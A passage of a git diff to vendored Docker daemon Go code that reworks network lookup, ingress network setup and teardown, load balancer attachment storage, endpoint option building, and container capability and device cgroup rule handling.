b/vendor/github.com/docker/docker/daemon/names/names.go similarity index 86% rename from vendor/github.com/docker/docker/utils/names.go rename to vendor/github.com/docker/docker/daemon/names/names.go index 632062819c..22bba53d69 100644 --- a/vendor/github.com/docker/docker/utils/names.go +++ b/vendor/github.com/docker/docker/daemon/names/names.go @@ -1,4 +1,4 @@ -package utils +package names // import "github.com/docker/docker/daemon/names" import "regexp" diff --git a/vendor/github.com/docker/docker/daemon/network.go b/vendor/github.com/docker/docker/daemon/network.go index ab8fd88da8..4263409be8 100644 --- a/vendor/github.com/docker/docker/daemon/network.go +++ b/vendor/github.com/docker/docker/daemon/network.go @@ -1,66 +1,97 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "net" "runtime" "sort" + "strconv" "strings" + "sync" - "github.com/Sirupsen/logrus" - apierrors "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/network" + "github.com/docker/docker/container" clustertypes "github.com/docker/docker/daemon/cluster/provider" + internalnetwork "github.com/docker/docker/daemon/network" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/opts" "github.com/docker/docker/pkg/plugingetter" "github.com/docker/docker/runconfig" + "github.com/docker/go-connections/nat" "github.com/docker/libnetwork" + lncluster "github.com/docker/libnetwork/cluster" "github.com/docker/libnetwork/driverapi" "github.com/docker/libnetwork/ipamapi" + "github.com/docker/libnetwork/netlabel" + "github.com/docker/libnetwork/options" networktypes "github.com/docker/libnetwork/types" "github.com/pkg/errors" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) +// PredefinedNetworkError is returned when user tries to create predefined network that already exists. 
+type PredefinedNetworkError string + +func (pnr PredefinedNetworkError) Error() string { + return fmt.Sprintf("operation is not permitted on predefined %s network ", string(pnr)) +} + +// Forbidden denotes the type of this error +func (pnr PredefinedNetworkError) Forbidden() {} + // NetworkControllerEnabled checks if the networking stack is enabled. // This feature depends on OS primitives and it's disabled in systems like Windows. func (daemon *Daemon) NetworkControllerEnabled() bool { return daemon.netController != nil } -// FindNetwork function finds a network for a given string that can represent network name or id -func (daemon *Daemon) FindNetwork(idName string) (libnetwork.Network, error) { - // Find by Name - n, err := daemon.GetNetworkByName(idName) - if err != nil && !isNoSuchNetworkError(err) { - return nil, err - } - - if n != nil { - return n, nil +// FindNetwork returns a network based on: +// 1. Full ID +// 2. Full Name +// 3. Partial ID +// as long as there is no ambiguity +func (daemon *Daemon) FindNetwork(term string) (libnetwork.Network, error) { + listByFullName := []libnetwork.Network{} + listByPartialID := []libnetwork.Network{} + for _, nw := range daemon.getAllNetworks() { + if nw.ID() == term { + return nw, nil + } + if nw.Name() == term { + listByFullName = append(listByFullName, nw) + } + if strings.HasPrefix(nw.ID(), term) { + listByPartialID = append(listByPartialID, nw) + } } - - // Find by id - return daemon.GetNetworkByID(idName) + switch { + case len(listByFullName) == 1: + return listByFullName[0], nil + case len(listByFullName) > 1: + return nil, errdefs.InvalidParameter(errors.Errorf("network %s is ambiguous (%d matches found on name)", term, len(listByFullName))) + case len(listByPartialID) == 1: + return listByPartialID[0], nil + case len(listByPartialID) > 1: + return nil, errdefs.InvalidParameter(errors.Errorf("network %s is ambiguous (%d matches found based on ID prefix)", term, len(listByPartialID))) + } + + // Be very 
careful to change the error type here, the + // libnetwork.ErrNoSuchNetwork error is used by the controller + // to retry the creation of the network as managed through the swarm manager + return nil, errdefs.NotFound(libnetwork.ErrNoSuchNetwork(term)) } -func isNoSuchNetworkError(err error) bool { - _, ok := err.(libnetwork.ErrNoSuchNetwork) - return ok -} - -// GetNetworkByID function returns a network whose ID begins with the given prefix. -// It fails with an error if no matching, or more than one matching, networks are found. -func (daemon *Daemon) GetNetworkByID(partialID string) (libnetwork.Network, error) { - list := daemon.GetNetworksByID(partialID) - - if len(list) == 0 { - return nil, libnetwork.ErrNoSuchNetwork(partialID) - } - if len(list) > 1 { - return nil, libnetwork.ErrInvalidID(partialID) +// GetNetworkByID function returns a network whose ID matches the given ID. +// It fails with an error if no matching network is found. +func (daemon *Daemon) GetNetworkByID(id string) (libnetwork.Network, error) { + c := daemon.netController + if c == nil { + return nil, libnetwork.ErrNoSuchNetwork(id) } - return list[0], nil + return c.NetworkByID(id) } // GetNetworkByName function returns a network for a given network name. 
@@ -76,8 +107,8 @@ func (daemon *Daemon) GetNetworkByName(name string) (libnetwork.Network, error) return c.NetworkByName(name) } -// GetNetworksByID returns a list of networks whose ID partially matches zero or more networks -func (daemon *Daemon) GetNetworksByID(partialID string) []libnetwork.Network { +// GetNetworksByIDPrefix returns a list of networks whose ID partially matches zero or more networks +func (daemon *Daemon) GetNetworksByIDPrefix(partialID string) []libnetwork.Network { c := daemon.netController if c == nil { return nil @@ -97,104 +128,124 @@ func (daemon *Daemon) GetNetworksByID(partialID string) []libnetwork.Network { // getAllNetworks returns a list containing all networks func (daemon *Daemon) getAllNetworks() []libnetwork.Network { c := daemon.netController - list := []libnetwork.Network{} - l := func(nw libnetwork.Network) bool { - list = append(list, nw) - return false + if c == nil { + return nil } - c.WalkNetworks(l) - - return list + return c.Networks() } -func isIngressNetwork(name string) bool { - return name == "ingress" +type ingressJob struct { + create *clustertypes.NetworkCreateRequest + ip net.IP + jobDone chan struct{} } -var ingressChan = make(chan struct{}, 1) +var ( + ingressWorkerOnce sync.Once + ingressJobsChannel chan *ingressJob + ingressID string +) -func ingressWait() func() { - ingressChan <- struct{}{} - return func() { <-ingressChan } +func (daemon *Daemon) startIngressWorker() { + ingressJobsChannel = make(chan *ingressJob, 100) + go func() { + // nolint: gosimple + for { + select { + case r := <-ingressJobsChannel: + if r.create != nil { + daemon.setupIngress(r.create, r.ip, ingressID) + ingressID = r.create.ID + } else { + daemon.releaseIngress(ingressID) + ingressID = "" + } + close(r.jobDone) + } + } + }() +} + +// enqueueIngressJob adds a ingress add/rm request to the worker queue. +// It guarantees the worker is started. 
+func (daemon *Daemon) enqueueIngressJob(job *ingressJob) { + ingressWorkerOnce.Do(daemon.startIngressWorker) + ingressJobsChannel <- job } // SetupIngress setups ingress networking. -func (daemon *Daemon) SetupIngress(create clustertypes.NetworkCreateRequest, nodeIP string) error { +// The function returns a channel which will signal the caller when the programming is completed. +func (daemon *Daemon) SetupIngress(create clustertypes.NetworkCreateRequest, nodeIP string) (<-chan struct{}, error) { ip, _, err := net.ParseCIDR(nodeIP) if err != nil { - return err + return nil, err } + done := make(chan struct{}) + daemon.enqueueIngressJob(&ingressJob{&create, ip, done}) + return done, nil +} - go func() { - controller := daemon.netController - controller.AgentInitWait() - - if n, err := daemon.GetNetworkByName(create.Name); err == nil && n != nil && n.ID() != create.ID { - if err := controller.SandboxDestroy("ingress-sbox"); err != nil { - logrus.Errorf("Failed to delete stale ingress sandbox: %v", err) - return - } - - // Cleanup any stale endpoints that might be left over during previous iterations - epList := n.Endpoints() - for _, ep := range epList { - if err := ep.Delete(true); err != nil { - logrus.Errorf("Failed to delete endpoint %s (%s): %v", ep.Name(), ep.ID(), err) - } - } - - if err := n.Delete(); err != nil { - logrus.Errorf("Failed to delete stale ingress network %s: %v", n.ID(), err) - return - } - } +// ReleaseIngress releases the ingress networking. +// The function returns a channel which will signal the caller when the programming is completed. +func (daemon *Daemon) ReleaseIngress() (<-chan struct{}, error) { + done := make(chan struct{}) + daemon.enqueueIngressJob(&ingressJob{nil, nil, done}) + return done, nil +} - if _, err := daemon.createNetwork(create.NetworkCreateRequest, create.ID, true); err != nil { - // If it is any other error other than already - // exists error log error and return. 
- if _, ok := err.(libnetwork.NetworkNameError); !ok { - logrus.Errorf("Failed creating ingress network: %v", err) - return - } +func (daemon *Daemon) setupIngress(create *clustertypes.NetworkCreateRequest, ip net.IP, staleID string) { + controller := daemon.netController + controller.AgentInitWait() - // Otherwise continue down the call to create or recreate sandbox. - } + if staleID != "" && staleID != create.ID { + daemon.releaseIngress(staleID) + } - n, err := daemon.GetNetworkByID(create.ID) - if err != nil { - logrus.Errorf("Failed getting ingress network by id after creating: %v", err) + if _, err := daemon.createNetwork(create.NetworkCreateRequest, create.ID, true); err != nil { + // If it is any other error other than already + // exists error log error and return. + if _, ok := err.(libnetwork.NetworkNameError); !ok { + logrus.Errorf("Failed creating ingress network: %v", err) return } + // Otherwise continue down the call to create or recreate sandbox. + } - sb, err := controller.NewSandbox("ingress-sbox", libnetwork.OptionIngress()) - if err != nil { - if _, ok := err.(networktypes.ForbiddenError); !ok { - logrus.Errorf("Failed creating ingress sandbox: %v", err) - } - return - } + _, err := daemon.GetNetworkByID(create.ID) + if err != nil { + logrus.Errorf("Failed getting ingress network by id after creating: %v", err) + } +} - ep, err := n.CreateEndpoint("ingress-endpoint", libnetwork.CreateOptionIpam(ip, nil, nil, nil)) - if err != nil { - logrus.Errorf("Failed creating ingress endpoint: %v", err) - return - } +func (daemon *Daemon) releaseIngress(id string) { + controller := daemon.netController - if err := ep.Join(sb, nil); err != nil { - logrus.Errorf("Failed joining ingress sandbox to ingress endpoint: %v", err) - } + if id == "" { + return + } - if err := sb.EnableService(); err != nil { - logrus.WithError(err).Error("Failed enabling service for ingress sandbox") - } - }() + n, err := controller.NetworkByID(id) + if err != nil { + 
logrus.Errorf("failed to retrieve ingress network %s: %v", id, err) + return + } - return nil + daemon.deleteLoadBalancerSandbox(n) + + if err := n.Delete(); err != nil { + logrus.Errorf("Failed to delete ingress network %s: %v", n.ID(), err) + return + } } // SetNetworkBootstrapKeys sets the bootstrap keys. func (daemon *Daemon) SetNetworkBootstrapKeys(keys []*networktypes.EncryptionKey) error { - return daemon.netController.SetKeys(keys) + err := daemon.netController.SetKeys(keys) + if err == nil { + // Upon successful key setting dispatch the keys available event + daemon.cluster.SendClusterEvent(lncluster.EventNetworkKeysAvailable) + } + return err } // UpdateAttachment notifies the attacher about the attachment config. @@ -236,16 +287,8 @@ func (daemon *Daemon) CreateNetwork(create types.NetworkCreateRequest) (*types.N } func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string, agent bool) (*types.NetworkCreateResponse, error) { - // If there is a pending ingress network creation wait here - // since ingress network creation can happen via node download - // from manager or task download. 
- if isIngressNetwork(create.Name) { - defer ingressWait()() - } - - if runconfig.IsPreDefinedNetwork(create.Name) && !agent { - err := fmt.Errorf("%s is a pre-defined network and cannot be created", create.Name) - return nil, apierrors.NewRequestForbiddenError(err) + if runconfig.IsPreDefinedNetwork(create.Name) { + return nil, PredefinedNetworkError(create.Name) } var warning string @@ -256,8 +299,12 @@ func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string } } if nw != nil { + // check if user defined CheckDuplicate, if set true, return err + // otherwise prepare a warning message if create.CheckDuplicate { - return nil, libnetwork.NetworkNameError(create.Name) + if !agent || nw.Info().Dynamic() { + return nil, libnetwork.NetworkNameError(create.Name) + } } warning = fmt.Sprintf("Network with name %s (id : %s) already exists", nw.Name(), nw.ID()) } @@ -273,6 +320,12 @@ func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string libnetwork.NetworkOptionDriverOpts(create.Options), libnetwork.NetworkOptionLabels(create.Labels), libnetwork.NetworkOptionAttachable(create.Attachable), + libnetwork.NetworkOptionIngress(create.Ingress), + libnetwork.NetworkOptionScope(create.Scope), + } + + if create.ConfigOnly { + nwOptions = append(nwOptions, libnetwork.NetworkOptionConfigOnly()) } if create.IPAM != nil { @@ -292,18 +345,31 @@ func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string nwOptions = append(nwOptions, libnetwork.NetworkOptionPersist(false)) } - if isIngressNetwork(create.Name) { - nwOptions = append(nwOptions, libnetwork.NetworkOptionIngress()) + if create.ConfigFrom != nil { + nwOptions = append(nwOptions, libnetwork.NetworkOptionConfigFrom(create.ConfigFrom.Network)) + } + + if agent && driver == "overlay" && (create.Ingress || runtime.GOOS == "windows") { + nodeIP, exists := daemon.GetAttachmentStore().GetIPForNetwork(id) + if !exists { + return nil, fmt.Errorf("Failed to find a load 
balancer IP to use for network: %v", id) + } + + nwOptions = append(nwOptions, libnetwork.NetworkOptionLBEndpoint(nodeIP)) } n, err := c.NewNetwork(driver, create.Name, id, nwOptions...) if err != nil { + if _, ok := err.(libnetwork.ErrDataStoreNotInitialized); ok { + // nolint: golint + return nil, errors.New("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.") + } return nil, err } - daemon.pluginRefCount(driver, driverapi.NetworkPluginEndpointType, plugingetter.ACQUIRE) + daemon.pluginRefCount(driver, driverapi.NetworkPluginEndpointType, plugingetter.Acquire) if create.IPAM != nil { - daemon.pluginRefCount(create.IPAM.Driver, ipamapi.PluginEndpointType, plugingetter.ACQUIRE) + daemon.pluginRefCount(create.IPAM.Driver, ipamapi.PluginEndpointType, plugingetter.Acquire) } daemon.LogNetworkEvent(n, "create") @@ -373,9 +439,6 @@ func (daemon *Daemon) UpdateContainerServiceConfig(containerName string, service // network. If either cannot be found, an err is returned. If the // network cannot be set up, an err is returned. func (daemon *Daemon) ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error { - if runtime.GOOS == "solaris" { - return errors.New("docker network connect is unsupported on Solaris platform") - } container, err := daemon.GetContainer(containerName) if err != nil { return err @@ -386,9 +449,6 @@ func (daemon *Daemon) ConnectContainerToNetwork(containerName, networkName strin // DisconnectContainerFromNetwork disconnects the given container from // the given network. If either cannot be found, an err is returned. 
func (daemon *Daemon) DisconnectContainerFromNetwork(containerName string, networkName string, force bool) error { - if runtime.GOOS == "solaris" { - return errors.New("docker network disconnect is unsupported on Solaris platform") - } container, err := daemon.GetContainer(containerName) if err != nil { if force { @@ -434,33 +494,84 @@ func (daemon *Daemon) GetNetworkDriverList() []string { } // DeleteManagedNetwork deletes an agent network. +// The requirement of networkID is enforced. func (daemon *Daemon) DeleteManagedNetwork(networkID string) error { - return daemon.deleteNetwork(networkID, true) + n, err := daemon.GetNetworkByID(networkID) + if err != nil { + return err + } + return daemon.deleteNetwork(n, true) } // DeleteNetwork destroys a network unless it's one of docker's predefined networks. func (daemon *Daemon) DeleteNetwork(networkID string) error { - return daemon.deleteNetwork(networkID, false) -} - -func (daemon *Daemon) deleteNetwork(networkID string, dynamic bool) error { - nw, err := daemon.FindNetwork(networkID) + n, err := daemon.GetNetworkByID(networkID) if err != nil { return err } + return daemon.deleteNetwork(n, false) +} +func (daemon *Daemon) deleteLoadBalancerSandbox(n libnetwork.Network) { + controller := daemon.netController + + //The only endpoint left should be the LB endpoint (nw.Name() + "-endpoint") + endpoints := n.Endpoints() + if len(endpoints) == 1 { + sandboxName := n.Name() + "-sbox" + + info := endpoints[0].Info() + if info != nil { + sb := info.Sandbox() + if sb != nil { + if err := sb.DisableService(); err != nil { + logrus.Warnf("Failed to disable service on sandbox %s: %v", sandboxName, err) + //Ignore error and attempt to delete the load balancer endpoint + } + } + } + + if err := endpoints[0].Delete(true); err != nil { + logrus.Warnf("Failed to delete endpoint %s (%s) in %s: %v", endpoints[0].Name(), endpoints[0].ID(), sandboxName, err) + //Ignore error and attempt to delete the sandbox. 
+ } + + if err := controller.SandboxDestroy(sandboxName); err != nil { + logrus.Warnf("Failed to delete %s sandbox: %v", sandboxName, err) + //Ignore error and attempt to delete the network. + } + } +} + +func (daemon *Daemon) deleteNetwork(nw libnetwork.Network, dynamic bool) error { if runconfig.IsPreDefinedNetwork(nw.Name()) && !dynamic { err := fmt.Errorf("%s is a pre-defined network and cannot be removed", nw.Name()) - return apierrors.NewRequestForbiddenError(err) + return errdefs.Forbidden(err) + } + + if dynamic && !nw.Info().Dynamic() { + if runconfig.IsPreDefinedNetwork(nw.Name()) { + // Predefined networks now support swarm services. Make this + // a no-op when cluster requests to remove the predefined network. + return nil + } + err := fmt.Errorf("%s is not a dynamic network", nw.Name()) + return errdefs.Forbidden(err) } if err := nw.Delete(); err != nil { return err } - daemon.pluginRefCount(nw.Type(), driverapi.NetworkPluginEndpointType, plugingetter.RELEASE) - ipamType, _, _, _ := nw.Info().IpamConfig() - daemon.pluginRefCount(ipamType, ipamapi.PluginEndpointType, plugingetter.RELEASE) - daemon.LogNetworkEvent(nw, "destroy") + + // If this is not a configuration only network, we need to + // update the corresponding remote drivers' reference counts + if !nw.Info().ConfigOnly() { + daemon.pluginRefCount(nw.Type(), driverapi.NetworkPluginEndpointType, plugingetter.Release) + ipamType, _, _, _ := nw.Info().IpamConfig() + daemon.pluginRefCount(ipamType, ipamapi.PluginEndpointType, plugingetter.Release) + daemon.LogNetworkEvent(nw, "destroy") + } + return nil } @@ -472,7 +583,7 @@ func (daemon *Daemon) GetNetworks() []libnetwork.Network { // clearAttachableNetworks removes the attachable networks // after disconnecting any connected container func (daemon *Daemon) clearAttachableNetworks() { - for _, n := range daemon.GetNetworks() { + for _, n := range daemon.getAllNetworks() { if !n.Info().Attachable() { continue } @@ -496,3 +607,312 @@ func (daemon 
*Daemon) clearAttachableNetworks() { } } } + +// buildCreateEndpointOptions builds endpoint options from a given network. +func buildCreateEndpointOptions(c *container.Container, n libnetwork.Network, epConfig *network.EndpointSettings, sb libnetwork.Sandbox, daemonDNS []string) ([]libnetwork.EndpointOption, error) { + var ( + bindings = make(nat.PortMap) + pbList []networktypes.PortBinding + exposeList []networktypes.TransportPort + createOptions []libnetwork.EndpointOption + ) + + defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName() + + if (!c.EnableServiceDiscoveryOnDefaultNetwork() && n.Name() == defaultNetName) || + c.NetworkSettings.IsAnonymousEndpoint { + createOptions = append(createOptions, libnetwork.CreateOptionAnonymous()) + } + + if epConfig != nil { + ipam := epConfig.IPAMConfig + + if ipam != nil { + var ( + ipList []net.IP + ip, ip6, linkip net.IP + ) + + for _, ips := range ipam.LinkLocalIPs { + if linkip = net.ParseIP(ips); linkip == nil && ips != "" { + return nil, errors.Errorf("Invalid link-local IP address: %s", ipam.LinkLocalIPs) + } + ipList = append(ipList, linkip) + + } + + if ip = net.ParseIP(ipam.IPv4Address); ip == nil && ipam.IPv4Address != "" { + return nil, errors.Errorf("Invalid IPv4 address: %s)", ipam.IPv4Address) + } + + if ip6 = net.ParseIP(ipam.IPv6Address); ip6 == nil && ipam.IPv6Address != "" { + return nil, errors.Errorf("Invalid IPv6 address: %s)", ipam.IPv6Address) + } + + createOptions = append(createOptions, + libnetwork.CreateOptionIpam(ip, ip6, ipList, nil)) + + } + + for _, alias := range epConfig.Aliases { + createOptions = append(createOptions, libnetwork.CreateOptionMyAlias(alias)) + } + for k, v := range epConfig.DriverOpts { + createOptions = append(createOptions, libnetwork.EndpointOptionGeneric(options.Generic{k: v})) + } + } + + if c.NetworkSettings.Service != nil { + svcCfg := c.NetworkSettings.Service + + var vip string + if svcCfg.VirtualAddresses[n.ID()] != nil { + vip = 
svcCfg.VirtualAddresses[n.ID()].IPv4 + } + + var portConfigs []*libnetwork.PortConfig + for _, portConfig := range svcCfg.ExposedPorts { + portConfigs = append(portConfigs, &libnetwork.PortConfig{ + Name: portConfig.Name, + Protocol: libnetwork.PortConfig_Protocol(portConfig.Protocol), + TargetPort: portConfig.TargetPort, + PublishedPort: portConfig.PublishedPort, + }) + } + + createOptions = append(createOptions, libnetwork.CreateOptionService(svcCfg.Name, svcCfg.ID, net.ParseIP(vip), portConfigs, svcCfg.Aliases[n.ID()])) + } + + if !containertypes.NetworkMode(n.Name()).IsUserDefined() { + createOptions = append(createOptions, libnetwork.CreateOptionDisableResolution()) + } + + // configs that are applicable only for the endpoint in the network + // to which container was connected to on docker run. + // Ideally all these network-specific endpoint configurations must be moved under + // container.NetworkSettings.Networks[n.Name()] + if n.Name() == c.HostConfig.NetworkMode.NetworkName() || + (n.Name() == defaultNetName && c.HostConfig.NetworkMode.IsDefault()) { + if c.Config.MacAddress != "" { + mac, err := net.ParseMAC(c.Config.MacAddress) + if err != nil { + return nil, err + } + + genericOption := options.Generic{ + netlabel.MacAddress: mac, + } + + createOptions = append(createOptions, libnetwork.EndpointOptionGeneric(genericOption)) + } + + } + + // Port-mapping rules belong to the container & applicable only to non-internal networks + portmaps := getSandboxPortMapInfo(sb) + if n.Info().Internal() || len(portmaps) > 0 { + return createOptions, nil + } + + if c.HostConfig.PortBindings != nil { + for p, b := range c.HostConfig.PortBindings { + bindings[p] = []nat.PortBinding{} + for _, bb := range b { + bindings[p] = append(bindings[p], nat.PortBinding{ + HostIP: bb.HostIP, + HostPort: bb.HostPort, + }) + } + } + } + + portSpecs := c.Config.ExposedPorts + ports := make([]nat.Port, len(portSpecs)) + var i int + for p := range portSpecs { + ports[i] = p + i++ + } 
+ nat.SortPortMap(ports, bindings) + for _, port := range ports { + expose := networktypes.TransportPort{} + expose.Proto = networktypes.ParseProtocol(port.Proto()) + expose.Port = uint16(port.Int()) + exposeList = append(exposeList, expose) + + pb := networktypes.PortBinding{Port: expose.Port, Proto: expose.Proto} + binding := bindings[port] + for i := 0; i < len(binding); i++ { + pbCopy := pb.GetCopy() + newP, err := nat.NewPort(nat.SplitProtoPort(binding[i].HostPort)) + var portStart, portEnd int + if err == nil { + portStart, portEnd, err = newP.Range() + } + if err != nil { + return nil, errors.Wrapf(err, "Error parsing HostPort value (%s)", binding[i].HostPort) + } + pbCopy.HostPort = uint16(portStart) + pbCopy.HostPortEnd = uint16(portEnd) + pbCopy.HostIP = net.ParseIP(binding[i].HostIP) + pbList = append(pbList, pbCopy) + } + + if c.HostConfig.PublishAllPorts && len(binding) == 0 { + pbList = append(pbList, pb) + } + } + + var dns []string + + if len(c.HostConfig.DNS) > 0 { + dns = c.HostConfig.DNS + } else if len(daemonDNS) > 0 { + dns = daemonDNS + } + + if len(dns) > 0 { + createOptions = append(createOptions, + libnetwork.CreateOptionDNS(dns)) + } + + createOptions = append(createOptions, + libnetwork.CreateOptionPortMapping(pbList), + libnetwork.CreateOptionExposedPorts(exposeList)) + + return createOptions, nil +} + +// getEndpointInNetwork returns the container's endpoint to the provided network. 
+func getEndpointInNetwork(name string, n libnetwork.Network) (libnetwork.Endpoint, error) { + endpointName := strings.TrimPrefix(name, "/") + return n.EndpointByName(endpointName) +} + +// getSandboxPortMapInfo retrieves the current port-mapping programmed for the given sandbox +func getSandboxPortMapInfo(sb libnetwork.Sandbox) nat.PortMap { + pm := nat.PortMap{} + if sb == nil { + return pm + } + + for _, ep := range sb.Endpoints() { + pm, _ = getEndpointPortMapInfo(ep) + if len(pm) > 0 { + break + } + } + return pm +} + +func getEndpointPortMapInfo(ep libnetwork.Endpoint) (nat.PortMap, error) { + pm := nat.PortMap{} + driverInfo, err := ep.DriverInfo() + if err != nil { + return pm, err + } + + if driverInfo == nil { + // It is not an error for epInfo to be nil + return pm, nil + } + + if expData, ok := driverInfo[netlabel.ExposedPorts]; ok { + if exposedPorts, ok := expData.([]networktypes.TransportPort); ok { + for _, tp := range exposedPorts { + natPort, err := nat.NewPort(tp.Proto.String(), strconv.Itoa(int(tp.Port))) + if err != nil { + return pm, fmt.Errorf("Error parsing Port value(%v):%v", tp.Port, err) + } + pm[natPort] = nil + } + } + } + + mapData, ok := driverInfo[netlabel.PortMap] + if !ok { + return pm, nil + } + + if portMapping, ok := mapData.([]networktypes.PortBinding); ok { + for _, pp := range portMapping { + natPort, err := nat.NewPort(pp.Proto.String(), strconv.Itoa(int(pp.Port))) + if err != nil { + return pm, err + } + natBndg := nat.PortBinding{HostIP: pp.HostIP.String(), HostPort: strconv.Itoa(int(pp.HostPort))} + pm[natPort] = append(pm[natPort], natBndg) + } + } + + return pm, nil +} + +// buildEndpointInfo sets endpoint-related fields on container.NetworkSettings based on the provided network and endpoint. 
+func buildEndpointInfo(networkSettings *internalnetwork.Settings, n libnetwork.Network, ep libnetwork.Endpoint) error { + if ep == nil { + return errors.New("endpoint cannot be nil") + } + + if networkSettings == nil { + return errors.New("network cannot be nil") + } + + epInfo := ep.Info() + if epInfo == nil { + // It is not an error to get an empty endpoint info + return nil + } + + if _, ok := networkSettings.Networks[n.Name()]; !ok { + networkSettings.Networks[n.Name()] = &internalnetwork.EndpointSettings{ + EndpointSettings: &network.EndpointSettings{}, + } + } + networkSettings.Networks[n.Name()].NetworkID = n.ID() + networkSettings.Networks[n.Name()].EndpointID = ep.ID() + + iface := epInfo.Iface() + if iface == nil { + return nil + } + + if iface.MacAddress() != nil { + networkSettings.Networks[n.Name()].MacAddress = iface.MacAddress().String() + } + + if iface.Address() != nil { + ones, _ := iface.Address().Mask.Size() + networkSettings.Networks[n.Name()].IPAddress = iface.Address().IP.String() + networkSettings.Networks[n.Name()].IPPrefixLen = ones + } + + if iface.AddressIPv6() != nil && iface.AddressIPv6().IP.To16() != nil { + onesv6, _ := iface.AddressIPv6().Mask.Size() + networkSettings.Networks[n.Name()].GlobalIPv6Address = iface.AddressIPv6().IP.String() + networkSettings.Networks[n.Name()].GlobalIPv6PrefixLen = onesv6 + } + + return nil +} + +// buildJoinOptions builds endpoint Join options from a given network. 
+func buildJoinOptions(networkSettings *internalnetwork.Settings, n interface { + Name() string +}) ([]libnetwork.EndpointOption, error) { + var joinOptions []libnetwork.EndpointOption + if epConfig, ok := networkSettings.Networks[n.Name()]; ok { + for _, str := range epConfig.Links { + name, alias, err := opts.ParseLink(str) + if err != nil { + return nil, err + } + joinOptions = append(joinOptions, libnetwork.CreateOptionAlias(name, alias)) + } + for k, v := range epConfig.DriverOpts { + joinOptions = append(joinOptions, libnetwork.EndpointOptionGeneric(options.Generic{k: v})) + } + } + + return joinOptions, nil +} diff --git a/vendor/github.com/docker/docker/daemon/network/settings.go b/vendor/github.com/docker/docker/daemon/network/settings.go index 8f6b7dd59e..b0460ed6ae 100644 --- a/vendor/github.com/docker/docker/daemon/network/settings.go +++ b/vendor/github.com/docker/docker/daemon/network/settings.go @@ -1,9 +1,12 @@ -package network +package network // import "github.com/docker/docker/daemon/network" import ( + "net" + networktypes "github.com/docker/docker/api/types/network" clustertypes "github.com/docker/docker/daemon/cluster/provider" "github.com/docker/go-connections/nat" + "github.com/pkg/errors" ) // Settings stores configuration details about the daemon network config @@ -31,3 +34,36 @@ type EndpointSettings struct { *networktypes.EndpointSettings IPAMOperational bool } + +// AttachmentStore stores the load balancer IP address for a network id. +type AttachmentStore struct { + //key: networkd id + //value: load balancer ip address + networkToNodeLBIP map[string]net.IP +} + +// ResetAttachments clears any existing load balancer IP to network mapping and +// sets the mapping to the given attachments. 
+func (store *AttachmentStore) ResetAttachments(attachments map[string]string) error { + store.ClearAttachments() + for nid, nodeIP := range attachments { + ip, _, err := net.ParseCIDR(nodeIP) + if err != nil { + store.networkToNodeLBIP = make(map[string]net.IP) + return errors.Wrapf(err, "Failed to parse load balancer address %s", nodeIP) + } + store.networkToNodeLBIP[nid] = ip + } + return nil +} + +// ClearAttachments clears all the mappings of network to load balancer IP Address. +func (store *AttachmentStore) ClearAttachments() { + store.networkToNodeLBIP = make(map[string]net.IP) +} + +// GetIPForNetwork return the load balancer IP address for the given network. +func (store *AttachmentStore) GetIPForNetwork(networkID string) (net.IP, bool) { + ip, exists := store.networkToNodeLBIP[networkID] + return ip, exists +} diff --git a/vendor/github.com/docker/docker/daemon/oci.go b/vendor/github.com/docker/docker/daemon/oci.go new file mode 100644 index 0000000000..52050e24fa --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/oci.go @@ -0,0 +1,78 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "fmt" + "regexp" + "strconv" + + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/caps" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +// nolint: gosimple +var ( + deviceCgroupRuleRegex = regexp.MustCompile("^([acb]) ([0-9]+|\\*):([0-9]+|\\*) ([rwm]{1,3})$") +) + +func setCapabilities(s *specs.Spec, c *container.Container) error { + var caplist []string + var err error + if c.HostConfig.Privileged { + caplist = caps.GetAllCapabilities() + } else { + caplist, err = caps.TweakCapabilities(s.Process.Capabilities.Bounding, c.HostConfig.CapAdd, c.HostConfig.CapDrop) + if err != nil { + return err + } + } + s.Process.Capabilities.Effective = caplist + s.Process.Capabilities.Bounding = caplist + s.Process.Capabilities.Permitted = caplist + s.Process.Capabilities.Inheritable = caplist + // setUser has already 
been executed here + // if non root drop capabilities in the way execve does + if s.Process.User.UID != 0 { + s.Process.Capabilities.Effective = []string{} + s.Process.Capabilities.Permitted = []string{} + } + return nil +} + +func appendDevicePermissionsFromCgroupRules(devPermissions []specs.LinuxDeviceCgroup, rules []string) ([]specs.LinuxDeviceCgroup, error) { + for _, deviceCgroupRule := range rules { + ss := deviceCgroupRuleRegex.FindAllStringSubmatch(deviceCgroupRule, -1) + if len(ss[0]) != 5 { + return nil, fmt.Errorf("invalid device cgroup rule format: '%s'", deviceCgroupRule) + } + matches := ss[0] + + dPermissions := specs.LinuxDeviceCgroup{ + Allow: true, + Type: matches[1], + Access: matches[4], + } + if matches[2] == "*" { + major := int64(-1) + dPermissions.Major = &major + } else { + major, err := strconv.ParseInt(matches[2], 10, 64) + if err != nil { + return nil, fmt.Errorf("invalid major value in device cgroup rule format: '%s'", deviceCgroupRule) + } + dPermissions.Major = &major + } + if matches[3] == "*" { + minor := int64(-1) + dPermissions.Minor = &minor + } else { + minor, err := strconv.ParseInt(matches[3], 10, 64) + if err != nil { + return nil, fmt.Errorf("invalid minor value in device cgroup rule format: '%s'", deviceCgroupRule) + } + dPermissions.Minor = &minor + } + devPermissions = append(devPermissions, dPermissions) + } + return devPermissions, nil +} diff --git a/vendor/github.com/docker/docker/daemon/oci_linux.go b/vendor/github.com/docker/docker/daemon/oci_linux.go index a72b0b873d..6fb7a26dcb 100644 --- a/vendor/github.com/docker/docker/daemon/oci_linux.go +++ b/vendor/github.com/docker/docker/daemon/oci_linux.go @@ -1,4 +1,4 